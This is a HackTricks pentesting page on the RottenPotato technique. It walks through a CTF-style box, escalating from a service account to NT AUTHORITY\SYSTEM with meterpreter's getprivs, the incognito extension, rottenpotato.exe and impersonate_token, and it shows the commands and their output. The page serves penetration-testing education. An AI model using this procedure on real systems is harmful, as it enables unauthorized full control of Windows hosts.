HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
RottenPotato
Support HackTricks and get benefits!
โ€‹
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
The info in this page info was extracted from this postโ€‹
Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges.
I wonโ€™t go into the details on how this exploit works, the article above explains it far better than I ever could.
Letโ€™s check our privileges with meterpreter:
1
meterpreter > getprivs
2
โ€‹
3
Enabled Process Privileges
4
==========================
5
โ€‹
6
Name
7
----
8
SeAssignPrimaryTokenPrivilege
9
SeChangeNotifyPrivilege
10
SeCreateGlobalPrivilege
11
SeImpersonatePrivilege
12
SeIncreaseQuotaPrivilege
13
SeIncreaseWorkingSetPrivilege
Copied!
Excellent, it looks like we have the privileges we need to perform the attack. Letโ€™s upload rottenpotato.exe
Back on our meterpreter session we load the incognito extension.
1
meterpreter > use incognito
2
Loading extension incognito...Success.
3
meterpreter > list_tokens -u
4
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
5
Call rev2self if primary process token is SYSTEM
6
โ€‹
7
Delegation Tokens Available
8
========================================
9
NT SERVICE\SQLSERVERAGENT
10
NT SERVICE\SQLTELEMETRY
11
TALLY\Sarah
12
โ€‹
13
Impersonation Tokens Available
14
========================================
15
No tokens available
Copied!
We can see we currently have no Impersonation Tokens. Letโ€™s run the Rotten Potato exploit.
1
meterpreter > execute -f rottenpotato.exe -Hc
2
Process 3104 created.
3
Channel 2 created.
4
meterpreter > list_tokens -u
5
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
6
Call rev2self if primary process token is SYSTEM
7
โ€‹
8
Delegation Tokens Available
9
========================================
10
NT SERVICE\SQLSERVERAGENT
11
NT SERVICE\SQLTELEMETRY
12
TALLY\Sarah
13
โ€‹
14
Impersonation Tokens Available
15
========================================
16
NT AUTHORITY\SYSTEM
Copied!
We need to quickly impersonate the token or it will disappear.
1
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
2
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
3
Call rev2self if primary process token is SYSTEM
4
[-] No delegation token available
5
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
6
meterpreter > getuid
7
Server username: NT AUTHORITY\SYSTEM
Copied!
Success! We have our SYSTEM shell and can grab the root.txt file!
โ€‹
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
Support HackTricks and get benefits!
Copy link